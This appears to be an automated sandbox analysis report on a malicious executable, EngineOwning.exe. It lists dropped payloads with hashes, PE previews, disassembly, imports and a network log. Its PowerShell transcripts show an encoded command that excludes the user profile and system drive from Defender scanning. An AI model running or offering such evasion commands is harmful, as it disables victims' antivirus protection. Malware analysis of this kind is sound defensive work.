                                                                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                              Malicious:false
                                                                              Preview:1
                                                                              Process:C:\Users\user\AppData\Roaming\Windows\services86.exe
                                                                              File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):14544
                                                                              Entropy (8bit):6.2660301556221185
                                                                              Encrypted:false
                                                                              SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                              MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                              SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                              SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                              SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                              Malicious:true
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................
                                                                              Process:C:\ProgramData\winrsdhost.exe
                                                                              File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):4442624
                                                                              Entropy (8bit):7.998792696058525
                                                                              Encrypted:true
                                                                              SSDEEP:98304:PdfyY1PrgE21Iec3nuSwkw0wjRKNCLkibijuKNoVEHeK1:lKMPrR2uec3nokw0CKCLHbiNeo
                                                                              MD5:108368196293017A706ADE912F519495
                                                                              SHA1:A11265CEF65B6FA780EF212E099E75FBF4603CD5
                                                                              SHA-256:836B0CBA74A9CEDE49BCA5E7FB1B96B1A327065C29648C1B0203D7D1F71B2CC2
                                                                              SHA-512:8705330672ECAC742624E45ABF6A0C5715C07C1BC7EB8197BB09767BD8A80E47D3ED04B6C62A21772644686AED8ABE15813CE672D4FC705621E9F6F9C6E79AEC
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: Avira, Detection: 100%
                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....zfb.........."...........C..........@C....@..... ....................... D...........@...@......@............... ................................D..............................................................................................@C.H...........a...%0r0..C.. ....C.................@....text...`....@C.......C............. ..`.rsrc.........D.......C.............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):6372
                                                                              Entropy (8bit):5.582380672671181
                                                                              Encrypted:false
                                                                              SSDEEP:96:BZ7/qZN2TPFqDo1ZyOZf/qZN2TPFqDo1ZDV97VjZ1/qZN2TPFqDo1ZrGll/Zk:fTlTfxTJ
                                                                              MD5:BFB101BDDBD1699AA36C9AC957DBF110
                                                                              SHA1:10ADD37447C2841A73D95FD07CB53E40057C7826
                                                                              SHA-256:5DB5F01BF6F66A0302CEAC44528D6E9A5874D3DFEF1678A954E3A64F1E859A79
                                                                              SHA-512:BD575F702D7FCE433675460394E4C505F9CE65805E6EB00470EEB44212226B638CCDB111DA2AE4E6ACAA163F11F7EE7F860A73A4BA09891628CD9B98E8FEEC65
                                                                              Malicious:false
                                                                              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220426210918..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A..Process ID: 6744..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220426210918..**********************..PS><#stgh#> Add-MpPreference <#fep#> -ExclusionPath @(
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):6372
                                                                              Entropy (8bit):5.582760445899722
                                                                              Encrypted:false
                                                                              SSDEEP:96:BZO/qZN2TPuqDo1ZROZB/qZN2TPuqDo1ZQ97VjZC/qZN2TPuqDo1ZgGll+ZN:uTDTWTr
                                                                              MD5:3F83F535338859C8E5358ED056C85809
                                                                              SHA1:DDC800598BF18EDE2AF103D879FDAFBB0CFF8208
                                                                              SHA-256:E3184AB0FEA79938D8B7AACF03A7553C82ACB674204FF78BD2D80B80928C9A24
                                                                              SHA-512:68ED5E92F7F7833ADA314E25954A7693DDDE0539BF76516A72F71535B9B49115DD7816C6A497A957D9DBC8FA78A49D55395B74E511DA5B431DD50D637E34DCF8
                                                                              Malicious:false
                                                                              Preview:.**********************..Windows PowerShell transcript start..Start time: 20220426211011..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 715575 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand PAAjAHMAdABnAGgAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBmAGUAcAAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwBjAHUAaAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBmAGoAZQAjAD4A..Process ID: 2996..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220426211011..**********************..PS><#stgh#> Add-MpPreference <#fep#> -ExclusionPath @(
                                                                              Process:C:\Windows\System32\svchost.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):55
                                                                              Entropy (8bit):4.306461250274409
                                                                              Encrypted:false
                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                              Malicious:false
                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                              Process:C:\Users\user\Desktop\EngineOwning.exe
                                                                              File Type:C source, ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1185
                                                                              Entropy (8bit):4.605294140687749
                                                                              Encrypted:false
                                                                              SSDEEP:24:iLceFjH6MwAD/47ET2dbIaiQ5m96Gvbfh1D/+mOS:O5wRECbDGbhYmX
                                                                              MD5:76405D89E40CFE0608299BEF4F2E6E63
                                                                              SHA1:33A0478F7671E11C6E5C427FD56036FDD8AA8047
                                                                              SHA-256:733F0820FFE2EF3C0536E52E74F2B1A60F18144E8F1CB48B394B4A4D8E84F9EF
                                                                              SHA-512:B520B8702788A1AE55DAC6E1C133CADAE2542778B4B2D5F28E45C390C7A2AB423AEC665482F66CAFE0CC545DE653E0C416C1A55942F388017EA2C77E82E4E257
                                                                              Malicious:false
                                                                              Preview:[Cryptical] > Loading.......struct group_info init_groups = { .usage = ATOMIC_INIT(2) };....struct group_info *groups_alloc(int gidsetsize){.... struct group_info group_info;.... int nblocks;.... int i;.... nblocks = (gidsetsize + NGROUPS_PER_BLOCK - 1) / NGROUPS_PER_BLOCK;.... / Make sure we always allocate at least one indirect block pointer /.... nblocks = nblocks ? : 1;.... group_info = kmalloc(sizeof(group_info) + nblocks*sizeof(gid_t *), GFP_USER);....) if (!group_info).... return NULL;.... group_info->ngroups = gidsetsize;.... group_info->nblocks = nblocks;.... if (gidsetsize <= NGROUPS_SMALL).... group_info->blocks[0] = group_info->small_block;.... else {.... for (i = 0; i < nblocks; i++) {.... gid_t *b;.... b = (void *)__get_free_page(GFP_USER);.... if (!b)....
                                                                              File type:PE32+ executable (console) x86-64, for MS Windows
                                                                              Entropy (8bit):5.769887309549637
                                                                              TrID:
                                                                              • Win64 Executable Console (202006/5) 92.65%
                                                                              • Win64 Executable (generic) (12005/4) 5.51%
                                                                              • Generic Win/DOS Executable (2004/3) 0.92%
                                                                              • DOS Executable Generic (2002/1) 0.92%
                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                              File name:EngineOwning.exe
                                                                              File size:497152
                                                                              MD5:6b7e5f4517d6837eea3c06bae837f767
                                                                              SHA1:e4b9405e06976b9721c3996cfb3ee95a1f8bb28c
                                                                              SHA256:cd5e8cc37c3257aae9f285bc72c0a7e35a03c3f3c08be579aef4d0f0a31d82bb
                                                                              SHA512:ca82db1000aaba9967b839e5f1899064b0f9beaf22e729a0a1bc60df3702956f27c9c648d7653ec136fb63c564a252d97460730cdbbdd1b8850df76318d2c6e5
                                                                              SSDEEP:6144:uyI/G9L5xjc4IZQhC+2AFTpz0k/I5Wyuny5G:uyIu9L5x1IaYEZI5W6G
                                                                              TLSH:0BB4C71567B205CADA3B4533C58AF92168337C5C3BE692DF7A8839996E31FE08D74B10
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........j.E...E...E...L...W.......C.......g.......O.......A...Q...T...E...g.......J....M..D.......M.......D.......D...RichE..........
                                                                              Icon Hash:f0d4aee6a69ac070
                                                                              Entrypoint:0x14001d014
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:false
                                                                              Imagebase:0x140000000
                                                                              Subsystem:windows cui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                              DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                              Time Stamp:0x62667DF9 [Mon Apr 25 10:54:49 2022 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:6
                                                                              OS Version Minor:0
                                                                              File Version Major:6
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:6
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:36dc492b2c38e0b87f00274126d17bb8
                                                                              Instruction
                                                                              dec eax
                                                                              sub esp, 28h
                                                                              call 00007F4228DDDAB4h
                                                                              dec eax
                                                                              add esp, 28h
                                                                              jmp 00007F4228DDD407h
                                                                              int3
                                                                              int3
                                                                              dec eax
                                                                              mov dword ptr [esp+08h], ebx
                                                                              dec eax
                                                                              mov dword ptr [esp+10h], ebp
                                                                              dec eax
                                                                              mov dword ptr [esp+18h], esi
                                                                              push edi
                                                                              dec eax
                                                                              sub esp, 20h
                                                                              xor ebx, ebx
                                                                              dec eax
                                                                              mov esi, edx
                                                                              dec eax
                                                                              mov ebp, ecx
                                                                              cmp dword ptr [edx], ebx
                                                                              jle 00007F4228DDD5D0h
                                                                              mov edi, ebx
                                                                              dec eax
                                                                              mov edx, dword ptr [esi+08h]
                                                                              dec eax
                                                                              arpl word ptr [edi+edx], cx
                                                                              cmp dword ptr [ecx+ebp-04h], CCCCCCCCh
                                                                              jne 00007F4228DDD5A3h
                                                                              dec eax
                                                                              arpl word ptr [edi+edx+04h], ax
                                                                              dec eax
                                                                              add eax, ecx
                                                                              cmp dword ptr [eax+ebp], CCCCCCCCh
                                                                              je 00007F4228DDD5A1h
                                                                              dec eax
                                                                              mov ecx, dword ptr [esp+28h]
                                                                              dec eax
                                                                              mov edx, dword ptr [edi+edx+08h]
                                                                              call 00007F4228DDDBCDh
                                                                              inc ebx
                                                                              dec eax
                                                                              add edi, 10h
                                                                              cmp ebx, dword ptr [esi]
                                                                              jl 00007F4228DDD556h
                                                                              dec eax
                                                                              mov ebx, dword ptr [esp+30h]
                                                                              dec eax
                                                                              mov ebp, dword ptr [esp+38h]
                                                                              dec eax
                                                                              mov esi, dword ptr [esp+40h]
                                                                              dec eax
                                                                              add esp, 20h
                                                                              pop edi
                                                                              ret
                                                                              int3
                                                                              dec eax
                                                                              sub esp, 28h
                                                                              dec ebp
                                                                              mov eax, dword ptr [ecx+38h]
                                                                              dec eax
                                                                              mov ecx, edx
                                                                              dec ecx
                                                                              mov edx, ecx
                                                                              call 00007F4228DDD5A2h
                                                                              mov eax, 00000001h
                                                                              dec eax
                                                                              add esp, 28h
                                                                              ret
                                                                              int3
                                                                              int3
                                                                              int3
                                                                              inc eax
                                                                              push ebx
                                                                              inc ebp
                                                                              mov ebx, dword ptr [eax]
                                                                              dec eax
                                                                              mov ebx, edx
                                                                              inc ecx
                                                                              and ebx, FFFFFFF8h
                                                                              dec esp
                                                                              mov ecx, ecx
                                                                              inc ecx
                                                                              test byte ptr [eax], 00000004h
                                                                              dec esp
                                                                              mov edx, ecx
                                                                              je 00007F4228DDD5A5h
                                                                              inc ecx
                                                                              mov eax, dword ptr [eax+08h]
                                                                              dec ebp
                                                                              arpl word ptr [eax+04h], dx
                                                                              Programming Language:
                                                                              • [ C ] VS2013 UPD5 build 40629
                                                                              • [IMP] VS2008 SP1 build 30729
                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2f5bc0x17c.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x680000x1bcb4.rsrc
                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x660000x1404.pdata
                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000x12fc.reloc
                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2daf00x70.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x2dd000x28.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2db600x138.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x1f0000x7c8.rdata
                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                              .text0x10000x1d3cc0x1d400False0.407134748932data5.79600925834IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                              .rdata0x1f0000x1225e0x12400False0.390410958904data5.32937901235IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .data0x320000x33e900x2b200False0.117776268116data5.17111811559IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                              .pdata0x660000x14040x1600False0.462357954545data4.89690083141IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .rsrc0x680000x1bcb40x1be00False0.2388242713data3.39570961354IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                              .reloc0x840000x12fc0x1400False0.248828125data5.3730692966IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                              NameRVASizeTypeLanguageCountry
                                                                              RT_ICON0x681e80x33e0PNG image data, 256 x 256, 8-bit gray+alpha, non-interlaced
                                                                              RT_ICON0x6b5c80x10828dBase III DBT, version number 0, next free block index 40
                                                                              RT_ICON0x7bdf00x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 0, next used block 0
                                                                              RT_ICON0x800180x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0
                                                                              RT_ICON0x825c00x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0
                                                                              RT_ICON0x836680x468GLS_BINARY_LSB_FIRST
                                                                              RT_GROUP_ICON0x83ad00x5adata
                                                                              RT_MANIFEST0x83b2c0x188XML 1.0 document textEnglishUnited States
                                                                              DLLImport
                                                                              KERNEL32.dllVirtualQuery, MultiByteToWideChar, GlobalAlloc, GlobalFree, GlobalLock, WideCharToMultiByte, GlobalUnlock, SetConsoleTextAttribute, SetConsoleTitleA, GetStdHandle, Sleep, GetConsoleWindow, GetModuleHandleW, SetThreadExecutionState, QueryPerformanceCounter, QueryPerformanceFrequency, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetLastError, FreeLibrary, GetProcAddress, LoadLibraryA, VerSetConditionMask, FormatMessageW, UnhandledExceptionFilter, GetProcessHeap, HeapFree, HeapAlloc, RaiseException, InitializeSListHead, GetSystemTimeAsFileTime, CloseHandle, GetCurrentProcessId, IsDebuggerPresent, IsProcessorFeaturePresent, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, GetCurrentThreadId, CreateEventW, InitializeCriticalSectionAndSpinCount
                                                                              USER32.dllGetRawInputData, RegisterRawInputDevices, GetRawInputDeviceInfoA, GetRawInputDeviceList, RegisterDeviceNotificationW, UnregisterDeviceNotification, ToUnicode, ChangeDisplaySettingsExW, EnumDisplaySettingsW, EnumDisplaySettingsExW, EnumDisplayDevicesW, EnumDisplayMonitors, RegisterClassExW, LoadCursorW, GetClassLongPtrW, SetWindowLongW, GetWindowLongW, PtInRect, SetRect, ClipCursor, WindowFromPoint, ScreenToClient, ClientToScreen, GetCursorPos, SetCursor, SetCursorPos, AdjustWindowRectEx, MonitorFromWindow, SystemParametersInfoW, CreateIconIndirect, LoadImageW, GetMonitorInfoW, GetWindowRect, GetClientRect, SetWindowTextW, RemovePropW, GetPropW, SetPropW, ReleaseDC, GetDC, GetSystemMetrics, MsgWaitForMultipleObjects, ReleaseCapture, SetCapture, MapVirtualKeyW, GetKeyState, GetActiveWindow, SetFocus, IsZoomed, BringWindowToTop, IsIconic, IsWindowVisible, SetWindowPlacement, GetWindowPlacement, SetWindowPos, MoveWindow, FlashWindow, SetLayeredWindowAttributes, GetLayeredWindowAttributes, DestroyWindow, CreateWindowExW, UnregisterClassW, DefWindowProcW, DestroyIcon, SetClipboardData, GetClipboardData, EmptyClipboard, WaitMessage, PostMessageW, SendMessageW, GetMessageTime, PeekMessageW, DispatchMessageW, TranslateMessage, TrackMouseEvent, ShowWindow, SetForegroundWindow, OpenClipboard, CloseClipboard
                                                                              GDI32.dllCreateBitmap, CreateRectRgn, DeleteObject, CreateDIBSection, ChoosePixelFormat, DescribePixelFormat, SetPixelFormat, SwapBuffers, CreateDCW, DeleteDC, GetDeviceCaps, GetDeviceGammaRamp, SetDeviceGammaRamp
                                                                              SHELL32.dllDragAcceptFiles, DragFinish, DragQueryPoint, DragQueryFileW
                                                                              MSVCP140.dll_Query_perf_frequency, ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD@Z, ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N@Z, ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAA_JPEBD_J@Z, ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@XZ, ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ, _Xtime_get_ticks, _Query_perf_counter, _Thrd_sleep, _Cnd_do_broadcast_at_thread_exit, ?_Xlength_error@std@@YAXPEBD@Z, ?_Random_device@std@@YAIXZ, ?_Xout_of_range@std@@YAXPEBD@Z, ?_Throw_Cpp_error@std@@YAXH@Z, ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A, ?uncaught_exception@std@@YA_NXZ
                                                                              urlmon.dllURLDownloadToFileW
                                                                              ntdll.dllRtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext
                                                                              VCRUNTIME140_1.dll__CxxFrameHandler4
                                                                              VCRUNTIME140.dll__vcrt_GetModuleFileNameW, __vcrt_LoadLibraryExW, strstr, _CxxThrowException, __C_specific_handler, __current_exception_context, __C_specific_handler_noexcept, __current_exception, memcmp, memmove, memset, memcpy, __std_exception_copy, __std_exception_destroy, __std_terminate
                                                                              api-ms-win-crt-stdio-l1-1-0.dll__p__commode, __stdio_common_vsscanf, __stdio_common_vsprintf, _set_fmode
                                                                              api-ms-win-crt-string-l1-1-0.dllstrcpy, strspn, wcscmp, strncpy, strcat_s, strncmp, strcpy_s, strcmp, strcspn, strlen, wcscpy
                                                                              api-ms-win-crt-utility-l1-1-0.dllrand, srand, abs, qsort
                                                                              api-ms-win-crt-heap-l1-1-0.dllcalloc, _callnewh, _set_new_mode, realloc, free, malloc
                                                                              api-ms-win-crt-convert-l1-1-0.dllstrtoul
                                                                              api-ms-win-crt-runtime-l1-1-0.dllterminate, system, _beginthreadex, exit, _invalid_parameter_noinfo_noreturn, _configure_narrow_argv, _initialize_narrow_environment, _initialize_onexit_table, _register_onexit_function, _crt_atexit, _cexit, _register_thread_local_exe_atexit_callback, _seh_filter_exe, _set_app_type, _c_exit, _get_initial_narrow_environment, _initterm, _initterm_e, _exit, __p___argv, __p___argc, _wassert
                                                                              api-ms-win-crt-time-l1-1-0.dll_time64
                                                                              api-ms-win-crt-math-l1-1-0.dllpowf, __setusermatherr
                                                                              api-ms-win-crt-locale-l1-1-0.dll_configthreadlocale
                                                                              Language of compilation systemCountry where language is spokenMap
                                                                              EnglishUnited States
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Apr 26, 2022 21:08:55.622982979 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:55.623034954 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:55.623172045 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:55.662553072 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:55.662617922 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:55.710486889 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:55.710625887 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.362114906 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.362165928 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.362749100 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.362832069 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.368112087 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.408355951 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415263891 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415401936 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415431976 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415499926 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415514946 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415572882 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415584087 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415641069 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415658951 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415723085 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415731907 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415776968 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415786982 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415831089 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415839911 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415885925 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415894985 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415935993 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415945053 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.415990114 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.415999889 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416048050 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416059017 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416105986 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416119099 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416143894 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416169882 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416218996 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416230917 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416276932 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416286945 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416335106 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416346073 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416384935 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416409969 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416456938 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416481972 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416527987 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416551113 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416598082 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416619062 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416675091 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416692972 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416738987 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416785955 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416841030 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416858912 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416904926 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416927099 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.416976929 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.416996002 CEST44349744162.159.129.233192.168.2.5
                                                                              Apr 26, 2022 21:08:56.417045116 CEST49744443192.168.2.5162.159.129.233
                                                                              Apr 26, 2022 21:08:56.417063951 CEST44349744162.159.129.233192.168.2.5
